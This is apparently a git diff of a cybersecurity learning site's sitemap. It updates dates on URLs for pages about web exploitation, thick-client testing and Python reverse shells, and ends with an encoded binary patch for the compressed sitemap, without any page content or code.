https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-attacking-thick-clients-applications/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-basic-lab-setup/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-common-vulnerabilities/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-first-challenge/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-information-gathering-phase/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-reversing-and-patching/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tca-traffic-analysis/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/thick-application-checklist/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/thick-applications/tools-for-thick-apps/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/arbitrary-file-upload/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/broken-access-control/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/buffer-overflow/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/captcha-replay-attack/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/carriage-return-and-linefeed-crlf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/cross-frame-scripting-xfs/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/cross-site-request-forgery-csrf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/cross-site-scripting-xss/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/directory-traversal/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/http-authentication-schemes/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/insecure-deserialization/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/jwt-attacks/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/local-file-inclusion-lfi/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/nosql-injection/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/password-attacks/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/payloads/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/php-type-juggling-vulnerabilities/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/reflected-file-download-rfd/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/remote-code-execution-rce/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/remote-file-inclusion-rfi/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/server-side-request-forgery-ssrf/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/server-side-template-injection-ssti/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/session-puzzling-or-session-variable-overloading/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/sql-injection/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/webexploitation/xml-external-entity-xee/ - 2024-06-07 + 2024-06-08 daily https://amandaguglieri.github.io/hackinglife/tags/ - 2024-06-07 + 2024-06-08 daily \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 9f7186fbbd2bd29a4e89353de42b94b8f20ba117..5473cf2b157fddc2eabe4952508cf92ea6f30d7e 100644 GIT binary patch delta 4650 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 cqC@Y#*#2c5+Pda+^1f